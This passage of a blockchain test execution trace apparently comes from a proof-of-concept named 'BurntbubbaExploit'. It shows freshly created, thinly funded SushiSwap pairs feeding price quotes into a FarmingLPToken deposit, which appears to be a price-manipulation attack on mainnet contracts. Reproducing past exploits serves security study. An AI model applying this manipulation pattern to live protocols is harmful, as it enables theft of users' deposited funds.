    │   │   │   │   │   │   ├─ [44728] 0xd3A115077FCfD8f9F1734bCD4cAE19994226C131::initialize(AST: [0x27054b13b1B798B345b591a4d22e6562d47eA75a], USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 7: 0 → 0x000000000000000000000000a0b86991c6218b36c1d19d4a2e9eb0ce3606eb48
    │   │   │   │   │   │   │   │   @ 6: 0 → 0x00000000000000000000000027054b13b1b798b345b591a4d22e6562d47ea75a
    │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   ├─ emit PairCreated(token0: AST: [0x27054b13b1B798B345b591a4d22e6562d47eA75a], token1: USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48], pair: 0xd3A115077FCfD8f9F1734bCD4cAE19994226C131, : 3877)
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 4: 3876 → 3877
    │   │   │   │   │   │   │   @ 0x8a35acfbc15ff81a39ae7d344fd709f28e8600b4aa8c65c6b64bfe7fe36be0bf: 0 → 0x000000000000000000000000d3a115077fcfd8f9f1734bcd4cae19994226c131
    │   │   │   │   │   │   │   @ 0xd958d46113eac9e2f33a7ac2578be98eed4f8cb64ca00f2502820d0a4d965d40: 0 → 0x000000000000000000000000d3a115077fcfd8f9f1734bcd4cae19994226c131
    │   │   │   │   │   │   │   @ 0x22b25538d5cd4ad4a1080cf0b6d4c32882ef6c59e16d66e93c7d3435280f14eb: 0 → 0x000000000000000000000000d3a115077fcfd8f9f1734bcd4cae19994226c131
    │   │   │   │   │   │   │   @ 7: 0 → 0x000000000000000000000000a0b86991c6218b36c1d19d4a2e9eb0ce3606eb48
    │   │   │   │   │   │   └─ ← [Return] 0xd3A115077FCfD8f9F1734bCD4cAE19994226C131
    │   │   │   │   │   ├─ [2517] 0xd3A115077FCfD8f9F1734bCD4cAE19994226C131::getReserves() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0, 0, 0
    │   │   │   │   │   ├─ [29892] USDC::transferFrom(BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xd3A115077FCfD8f9F1734bCD4cAE19994226C131, 2000000 [2e6])
    │   │   │   │   │   │   ├─ [29097] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::transferFrom(BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xd3A115077FCfD8f9F1734bCD4cAE19994226C131, 2000000 [2e6]) [delegatecall]
    │   │   │   │   │   │   │   ├─ emit Transfer(from: BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xd3A115077FCfD8f9F1734bCD4cAE19994226C131, value: 2000000 [2e6])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0x2b4c1c3c97276590f84112533abe17ba0562aa691dfec1f8d9d09acd92e9d948: 0 → 0x00000000000000000000000000000000000000000000000000000000001e8480
    │   │   │   │   │   │   │   │   @ 0x635086ecbe21a86e025d4dbf9d688805b8ca2787b102c9904fb6b86025a0770d: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffe17b7f → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffc2f6ff
    │   │   │   │   │   │   │   │   @ 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac: 0x000000000000000000000000000000000000000000000000000000002f908380 → 0x000000000000000000000000000000000000000000000000000000002f71ff00
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [33191] AST::transferFrom(BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xd3A115077FCfD8f9F1734bCD4cAE19994226C131, 10000 [1e4])
    │   │   │   │   │   │   ├─ emit Transfer(from: BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xd3A115077FCfD8f9F1734bCD4cAE19994226C131, value: 10000 [1e4])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000000000000000000001f78dd → 0x00000000000000000000000000000000000000000000000000000000001f51cd
    │   │   │   │   │   │   │   @ 0xb7b2d76ffd9913762473e3aba6bedeec6042507b489f25504d98dd2700cec087: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffd8ef
    │   │   │   │   │   │   │   @ 0xdc65980e4bff03e5361db3fca0f6fa910298eee52a06a904e2f6c2ea0e5b1b9e: 0 → 10000
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [147650] 0xd3A115077FCfD8f9F1734bCD4cAE19994226C131::mint(BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   │   │   ├─ [624] AST::balanceOf(0xd3A115077FCfD8f9F1734bCD4cAE19994226C131) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 10000 [1e4]
    │   │   │   │   │   │   ├─ [1315] USDC::balanceOf(0xd3A115077FCfD8f9F1734bCD4cAE19994226C131) [staticcall]
    │   │   │   │   │   │   │   ├─ [529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(0xd3A115077FCfD8f9F1734bCD4cAE19994226C131) [delegatecall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 2000000 [2e6]
    │   │   │   │   │   │   │   └─ ← [Return] 2000000 [2e6]
    │   │   │   │   │   │   ├─ [338] 0xC0AEe478e3658e2610c5F7A4A2E1777cE9e4f2Ac::feeTo() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x5ad6211CD3fdE39A9cECB5df6f380b8263d1e277
    │   │   │   │   │   │   ├─ [2337] 0xC0AEe478e3658e2610c5F7A4A2E1777cE9e4f2Ac::migrator() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000
    │   │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x0000000000000000000000000000000000000000, value: 1000)
    │   │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 140421 [1.404e5])
    │   │   │   │   │   │   ├─ emit Sync(reserve0: 10000 [1e4], reserve1: 2000000 [2e6])
    │   │   │   │   │   │   ├─ emit Mint(sender: SushiRouter: [0xd9e1cE17f2641f24aE83637ab66a2cca9C378B9F], amount0: 10000 [1e4], amount1: 2000000 [2e6])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0: 0 → 141421
    │   │   │   │   │   │   │   @ 8: 0 → 0x6567bb5b00000000000000000000001e84800000000000000000000000002710
    │   │   │   │   │   │   │   @ 11: 0 → 0x00000000000000000000000000000000000000000000000000000004a817c800
    │   │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 140421
    │   │   │   │   │   │   │   @ 0xa6eef7e35abe7026729641147f7915573c7e97b47efa546f5f6e3230263bcb49: 0 → 1000
    │   │   │   │   │   │   └─ ← [Return] 140421 [1.404e5]
    │   │   │   │   │   └─ ← [Return] 2000000 [2e6], 10000 [1e4], 140421 [1.404e5]
    │   │   │   │   ├─ [2249336] SushiRouter::addLiquidity(SUSHI: [0x6B3595068778DD592e39A122f4f5a5cF09C90fE2], AST: [0x27054b13b1B798B345b591a4d22e6562d47eA75a], 400000000000000000000000 [4e23], 10000 [1e4], 0, 0, BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1701297987 [1.701e9])
    │   │   │   │   │   ├─ [2644] 0xC0AEe478e3658e2610c5F7A4A2E1777cE9e4f2Ac::getPair(SUSHI: [0x6B3595068778DD592e39A122f4f5a5cF09C90fE2], AST: [0x27054b13b1B798B345b591a4d22e6562d47eA75a]) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000
    │   │   │   │   │   ├─ [2034158] 0xC0AEe478e3658e2610c5F7A4A2E1777cE9e4f2Ac::createPair(SUSHI: [0x6B3595068778DD592e39A122f4f5a5cF09C90fE2], AST: [0x27054b13b1B798B345b591a4d22e6562d47eA75a])
    │   │   │   │   │   │   ├─ [1884378] → new AST_SUSHI@0xd47f61BFCeA6e64F9D3FEC529C44153E04CB73B9
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 12: 0 → 1
    │   │   │   │   │   │   │   │   @ 5: 0 → 0x000000000000000000000000c0aee478e3658e2610c5f7a4a2e1777ce9e4f2ac
    │   │   │   │   │   │   │   │   @ 3: 0 → 0xc8af530f7ea627f6bde5be590ec4f802b28d60e7fb34d393dbbb66178ccf1dd3
    │   │   │   │   │   │   │   └─ ← [Return] 9079 bytes of code
    │   │   │   │   │   │   ├─ [44728] AST_SUSHI::initialize(AST: [0x27054b13b1B798B345b591a4d22e6562d47eA75a], SUSHI: [0x6B3595068778DD592e39A122f4f5a5cF09C90fE2])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 7: 0 → 0x0000000000000000000000006b3595068778dd592e39a122f4f5a5cf09c90fe2
    │   │   │   │   │   │   │   │   @ 6: 0 → 0x00000000000000000000000027054b13b1b798b345b591a4d22e6562d47ea75a
    │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   ├─ emit PairCreated(token0: AST: [0x27054b13b1B798B345b591a4d22e6562d47eA75a], token1: SUSHI: [0x6B3595068778DD592e39A122f4f5a5cF09C90fE2], pair: AST_SUSHI: [0xd47f61BFCeA6e64F9D3FEC529C44153E04CB73B9], : 3878)
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 7: 0 → 0x0000000000000000000000006b3595068778dd592e39a122f4f5a5cf09c90fe2
    │   │   │   │   │   │   │   @ 0x820a78f82e01780993b0ae1b4ac244fba307ae407d481bcb6cd275bddf2a7186: 0 → 0x000000000000000000000000d47f61bfcea6e64f9d3fec529c44153e04cb73b9
    │   │   │   │   │   │   │   @ 0x1457cc0036e263f709c02049f81668bac4532b7b8f518e7a4dce6750970ccca0: 0 → 0x000000000000000000000000d47f61bfcea6e64f9d3fec529c44153e04cb73b9
    │   │   │   │   │   │   │   @ 4: 3877 → 3878
    │   │   │   │   │   │   │   @ 0x8a35acfbc15ff81a39ae7d344fd709f28e8600b4aa8c65c6b64bfe7fe36be0c0: 0 → 0x000000000000000000000000d47f61bfcea6e64f9d3fec529c44153e04cb73b9
    │   │   │   │   │   │   └─ ← [Return] AST_SUSHI: [0xd47f61BFCeA6e64F9D3FEC529C44153E04CB73B9]
    │   │   │   │   │   ├─ [2517] AST_SUSHI::getReserves() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0, 0, 0
    │   │   │   │   │   ├─ [27980] SUSHI::transferFrom(BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], AST_SUSHI: [0xd47f61BFCeA6e64F9D3FEC529C44153E04CB73B9], 400000000000000000000000 [4e23])
    │   │   │   │   │   │   ├─ emit Transfer(from: BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: AST_SUSHI: [0xd47f61BFCeA6e64F9D3FEC529C44153E04CB73B9], value: 400000000000000000000000 [4e23])
    │   │   │   │   │   │   ├─ emit Approval(owner: BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: SushiRouter: [0xd9e1cE17f2641f24aE83637ab66a2cca9C378B9F], value: 115792089237316195423570985008687907853269984665640563639457584007913129639935 [1.157e77])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x0000000000000000000000000000000000000000000054b40b1f852bda000000 → 0
    │   │   │   │   │   │   │   @ 0xcb648e2982735a5b3e2da9ae1a329bc3b2bc1fa22f998d8ed49d2c6f41edbea2: 0 → 0x0000000000000000000000000000000000000000000054b40b1f852bda000000
    │   │   │   │   │   │   │   @ 0xcd3497fafbfb091f23164107ea0c57486cde17375ac6d0adb0876f1f3ce8bff1: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffffab4bf4e07ad425ffffff
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [27191] AST::transferFrom(BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], AST_SUSHI: [0xd47f61BFCeA6e64F9D3FEC529C44153E04CB73B9], 10000 [1e4])
    │   │   │   │   │   │   ├─ emit Transfer(from: BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: AST_SUSHI: [0xd47f61BFCeA6e64F9D3FEC529C44153E04CB73B9], value: 10000 [1e4])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0xb7b2d76ffd9913762473e3aba6bedeec6042507b489f25504d98dd2700cec087: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffd8ef → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffb1df
    │   │   │   │   │   │   │   @ 0xa4f1b68206ed880deebad612631f03c76c4a32d9c7f0f6c96d2043f8dd4db066: 0 → 10000
    │   │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000000000000000000001f51cd → 0x00000000000000000000000000000000000000000000000000000000001f2abd
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [148183] AST_SUSHI::mint(BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   │   │   ├─ [624] AST::balanceOf(AST_SUSHI: [0xd47f61BFCeA6e64F9D3FEC529C44153E04CB73B9]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 10000 [1e4]
    │   │   │   │   │   │   ├─ [578] SUSHI::balanceOf(AST_SUSHI: [0xd47f61BFCeA6e64F9D3FEC529C44153E04CB73B9]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 400000000000000000000000 [4e23]
    │   │   │   │   │   │   ├─ [338] 0xC0AEe478e3658e2610c5F7A4A2E1777cE9e4f2Ac::feeTo() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x5ad6211CD3fdE39A9cECB5df6f380b8263d1e277
    │   │   │   │   │   │   ├─ [337] 0xC0AEe478e3658e2610c5F7A4A2E1777cE9e4f2Ac::migrator() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000
    │   │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x0000000000000000000000000000000000000000, value: 1000)
    │   │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 63245553202367 [6.324e13])
    │   │   │   │   │   │   ├─ emit Sync(reserve0: 10000 [1e4], reserve1: 400000000000000000000000 [4e23])
    │   │   │   │   │   │   ├─ emit Mint(sender: SushiRouter: [0xd9e1cE17f2641f24aE83637ab66a2cca9C378B9F], amount0: 10000 [1e4], amount1: 400000000000000000000000 [4e23])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0: 0 → 0x0000000000000000000000000000000000000000000000000000398580bb78a7
    │   │   │   │   │   │   │   @ 8: 0 → 0x6567bb5b0000000054b40b1f852bda0000000000000000000000000000002710
    │   │   │   │   │   │   │   @ 0xa6eef7e35abe7026729641147f7915573c7e97b47efa546f5f6e3230263bcb49: 0 → 1000
    │   │   │   │   │   │   │   @ 11: 0 → 0x00000000000000000000000000000000000000000cecb8f27f4200f3a0000000
    │   │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x0000000000000000000000000000000000000000000000000000398580bb74bf
    │   │   │   │   │   │   └─ ← [Return] 63245553202367 [6.324e13]
    │   │   │   │   │   └─ ← [Return] 400000000000000000000000 [4e23], 10000 [1e4], 63245553202367 [6.324e13]
    │   │   │   │   ├─ [492] SushiUSDC::balanceOf(BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 25156809832 [2.515e10]
    │   │   │   │   ├─ [352106] FarmingLPToken::deposit(25156809832 [2.515e10], [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48, 0x27054b13b1B798B345b591a4d22e6562d47eA75a, 0x6B3595068778DD592e39A122f4f5a5cF09C90fE2], [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 0x6B3595068778DD592e39A122f4f5a5cF09C90fE2], 0, BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1701297987 [1.701e9])
    │   │   │   │   │   ├─ [349365] 0x44D1C6b94B282c678c95B7f4B18de5A53EA4Fa9f::deposit(25156809832 [2.515e10], [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48, 0x27054b13b1B798B345b591a4d22e6562d47eA75a, 0x6B3595068778DD592e39A122f4f5a5cF09C90fE2], [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 0x6B3595068778DD592e39A122f4f5a5cF09C90fE2], 0, BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1701297987 [1.701e9]) [delegatecall]
    │   │   │   │   │   │   ├─ [25321] SushiUSDC::transferFrom(BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], FarmingLPToken: [0xa44e79a2c9a8965e7A6FA77BF0ca8FAF50e6C73E], 25156809832 [2.515e10])
    │   │   │   │   │   │   │   ├─ emit Transfer(from: BurntbubbaExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: FarmingLPToken: [0xa44e79a2c9a8965e7A6FA77BF0ca8FAF50e6C73E], value: 25156809832 [2.515e10])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000000000000000005db767468 → 0
    │   │   │   │   │   │   │   │   @ 0x758cf28c497240df37f2bfba6e924370623e4f2e5493f3940b7ca78b3d8fbfde: 0 → 0x00000000000000000000000000000000000000000000000000000005db767468
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   ├─ [432] SushiUSDC::totalSupply() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 88227612603823949 [8.822e16]
    │   │   │   │   │   │   ├─ [517] SushiUSDC::getReserves() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 7014213105075 [7.014e12], 3445432035340938810944 [3.445e21], 1701296987 [1.701e9]
    │   │   │   │   │   │   ├─ [7322] SushiRouter::getAmountsOut(1999999 [1.999e6], [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48, 0x27054b13b1B798B345b591a4d22e6562d47eA75a, 0x6B3595068778DD592e39A122f4f5a5cF09C90fE2]) [staticcall]
    │   │   │   │   │   │   │   ├─ [517] 0xd3A115077FCfD8f9F1734bCD4cAE19994226C131::getReserves() [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 10000 [1e4], 2000000 [2e6], 1701296987 [1.701e9]
    │   │   │   │   │   │   │   ├─ [517] AST_SUSHI::getReserves() [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 10000 [1e4], 400000000000000000000000 [4e23], 1701296987 [1.701e9]
    │   │   │   │   │   │   │   └─ ← [Return] [1999999 [1.999e6], 4992, 132924244496102830575687 [1.329e23]]
    │   │   │   │   │   │   ├─ [8764] SushiRouter::getAmountsOut(982414415896775 [9.824e14], [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 0x6B3595068778DD592e39A122f4f5a5cF09C90fE2]) [staticcall]
    │   │   │   │   │   │   │   ├─ [2517] 0x795065dCc9f64b5614C407a6EFDC400DA6221FB0::getReserves() [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 2426184846043070139732998 [2.426e24], 1438080914121275919083 [1.438e21], 1701288599 [1.701e9]
    │   │   │   │   │   │   │   └─ ← [Return] [982414415896775 [9.824e14], 1652456944262126787 [1.652e18]]
    │   │   │   │   │   │   ├─ [110534] 0xc2EdaD668740f1aA35E4D8f227fB8E17dcA888Cd::deposit(1, 25156809832 [2.515e10])
    │   │   │   │   │   │   │   ├─ [2492] SushiUSDC::balanceOf(0xc2EdaD668740f1aA35E4D8f227fB8E17dcA888Cd) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 76878872495537106 [7.687e16]
    │   │   │   │   │   │   │   ├─ [17069] SUSHI::mint(0xe94B5EEC1fA96CEecbD33EF5Baa8d00E4493F4f3, 55094047887 [5.509e10])
    │   │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0xe94B5EEC1fA96CEecbD33EF5Baa8d00E4493F4f3, value: 55094047887 [5.509e10])
    │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   @ 0xa64fa370f307dbb1e503e3d5b3b586dd14c3fe7092056848a3cf8de94c88471b: 0x0000000000000000000000000000000000000000000a871773a5949b4529ff3f → 0x0000000000000000000000000000000000000000000a871773a594a8190673ce
    │   │   │   │   │   │   │   │   │   @ 2: 0x000000000000000000000000000000000000000000cef6c44a2535bb2cbcaf3f → 0x000000000000000000000000000000000000000000cef6c44a2535c8009923ce
    │   │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   │   ├─ [10269] SUSHI::mint(0xc2EdaD668740f1aA35E4D8f227fB8E17dcA888Cd, 550940478877 [5.509e11])
    │   │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0xc2EdaD668740f1aA35E4D8f227fB8E17dcA888Cd, value: 550940478877 [5.509e11])
    │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   @ 2: 0x000000000000000000000000000000000000000000cef6c44a2535c8009923ce → 0x000000000000000000000000000000000000000000cef6c44a2536484735b16b
    │   │   │   │   │   │   │   │   │   @ 0x4eff73fb0bd0bd41224030aefae73a26f2441d7836ff860a31248ce57702dc69: 0x00000000000000000000000000000000000000000000d565705c89d947c530e2 → 0x00000000000000000000000000000000000000000000d565705c8a598e61be7f
    │   │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   │   ├─ [578] SUSHI::balanceOf(0xc2EdaD668740f1aA35E4D8f227fB8E17dcA888Cd) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 1007735278501026446032511 [1.007e24]
    │   │   │   │   │   │   │   ├─ [25225] SUSHI::transfer(FarmingLPToken: [0xa44e79a2c9a8965e7A6FA77BF0ca8FAF50e6C73E], 94307603729067727160 [9.43e19])
    │   │   │   │   │   │   │   │   ├─ emit Transfer(from: 0xc2EdaD668740f1aA35E4D8f227fB8E17dcA888Cd, to: FarmingLPToken: [0xa44e79a2c9a8965e7A6FA77BF0ca8FAF50e6C73E], value: 94307603729067727160 [9.43e19])
    │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   @ 0x8628260ef1dd54c9585eeca4cf442c5a0a6c867bc53f9b5267c8d0ca4c7d2930: 0 → 0x0000000000000000000000000000000000000000000000051cc7e9edb162d938
    │   │   │   │   │   │   │   │   │   @ 0x4eff73fb0bd0bd41224030aefae73a26f2441d7836ff860a31248ce57702dc69: 0x00000000000000000000000000000000000000000000d565705c8a598e61be7f → 0x00000000000000000000000000000000000000000000d5605394a06bdcfee547
    │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   ├─ [8221] SushiUSDC::transferFrom(FarmingLPToken: [0xa44e79a2c9a8965e7A6FA77BF0ca8FAF50e6C73E], 0xc2EdaD668740f1aA35E4D8f227fB8E17dcA888Cd, 25156809832 [2.515e10])
    │   │   │   │   │   │   │   │   ├─ emit Transfer(from: FarmingLPToken: [0xa44e79a2c9a8965e7A6FA77BF0ca8FAF50e6C73E], to: 0xc2EdaD668740f1aA35E4D8f227fB8E17dcA888Cd, value: 25156809832 [2.515e10])
    │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   @ 0xa777cf56dcfa637cf077d373873b63e894627ab94356bfcf2c82191ee15b5b14: 0x000000000000000000000000000000000000000000000000011120ed5dd43bd2 → 0x000000000000000000000000000000000000000000000000011120f3394ab03a
    │   │   │   │   │   │   │   │   │   @ 0x758cf28c497240df37f2bfba6e924370623e4f2e5493f3940b7ca78b3d8fbfde: 0x00000000000000000000000000000000000000000000000000000005db767468 → 0
    │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   ├─ emit Deposit(user: FarmingLPToken: [0xa44e79a2c9a8965e7A6FA77BF0ca8FAF50e6C73E], pid: 1, amount: 25156809832 [2.515e10])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0x8628260ef1dd54c9585eeca4cf442c5a0a6c867bc53f9b5267c8d0ca4c7d2930: 0 → 0x0000000000000000000000000000000000000000000000051cc7e9edb162d938
    │   │   │   │   │   │   │   │   @ 0xf652222313e28459528d920b65115c16c04f3efc82aaedc97be59f3f377c0d46: 0x000000000000000000000000000000000000000000000000dcd88814d670566a → 0x000000000000000000000000000000000000000000000000dcd88814d6ddaff2
    │   │   │   │   │   │   │   │   @ 0xa777cf56dcfa637cf077d373873b63e894627ab94356bfcf2c82191ee15b5b14: 0x000000000000000000000000000000000000000000000000011120ed5dd43bd2 → 0x000000000000000000000000000000000000000000000000011120f3394ab03a
    │   │   │   │   │   │   │   │   @ 0x6f198ca50d5350c385681ed003c8bff69eca51bc1edac00cc73a8863d2dacd29: 0x00000000000000000000000000000000000000000000000000001369a59138c2 → 0x0000000000000000000000000000000000000000000000000000136f8107ad2a
    │   │   │   │   │   │   │   │   @ 0x6f198ca50d5350c385681ed003c8bff69eca51bc1edac00cc73a8863d2dacd2a: 0x00000000000000000000000000000000000000000000000d4d0e6703ff4714cb → 0x0000000000000000000000000000000000000000000000126f64984f5f2242dc
    │   │   │   │   │   │   │   │   @ 0xf652222313e28459528d920b65115c16c04f3efc82aaedc97be59f3f377c0d45: 0x00000000000000000000000000000000000000000000000000000000011cf612 → 0x00000000000000000000000000000000000000000000000000000000011d09be
    │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   ├─ [578] SUSHI::balanceOf(FarmingLPToken: [0xa44e79a2c9a8965e7A6FA77BF0ca8FAF50e6C73E]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 94307603729067727160 [9.43e19]
    │   │   │   │   │   │   ├─ [2494] 0xEE083E0F0f5dE2ff34662F1ef6f76d897d5047EF::yieldVault() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000003e55ac0e6724bbe8ab40a60771b5d60fc8e93404
    │   │   │   │   │   │   ├─ [89643] 0x3e55AC0E6724BBe8aB40a60771B5D60fC8e93404::deposit(94307603729067727160 [9.43e19], FarmingLPToken: [0xa44e79a2c9a8965e7A6FA77BF0ca8FAF50e6C73E])
    │   │   │   │   │   │   │   ├─ [2321] 0x8798249c2E607446EfB7Ad49eC89dD1865Ff4272::totalSupply() [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 24555020523719371429023527 [2.455e25]
    │   │   │   │   │   │   │   ├─ [2578] SUSHI::balanceOf(0x8798249c2E607446EfB7Ad49eC89dD1865Ff4272) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 33289102665525200578318142 [3.328e25]
    │   │   │   │   │   │   │   ├─ [2490] 0x8798249c2E607446EfB7Ad49eC89dD1865Ff4272::balanceOf(0x3e55AC0E6724BBe8aB40a60771B5D60fC8e93404) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 289438263729420576 [2.894e17]
    │   │   │   │   │   │   │   ├─ [321] 0x8798249c2E607446EfB7Ad49eC89dD1865Ff4272::totalSupply() [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 24555020523719371429023527 [2.455e25]
    │   │   │   │   │   │   │   ├─ [578] SUSHI::balanceOf(0x8798249c2E607446EfB7Ad49eC89dD1865Ff4272) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 33289102665525200578318142 [3.328e25]
    │   │   │   │   │   │   │   ├─ [490] 0x8798249c2E607446EfB7Ad49eC89dD1865Ff4272::balanceOf(0x3e55AC0E6724BBe8aB40a60771B5D60fC8e93404) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 289438263729420576 [2.894e17]
    │   │   │   │   │   │   │   ├─ [32780] SUSHI::transferFrom(FarmingLPToken: [0xa44e79a2c9a8965e7A6FA77BF0ca8FAF50e6C73E], 0x3e55AC0E6724BBe8aB40a60771B5D60fC8e93404, 94307603729067727160 [9.43e19])
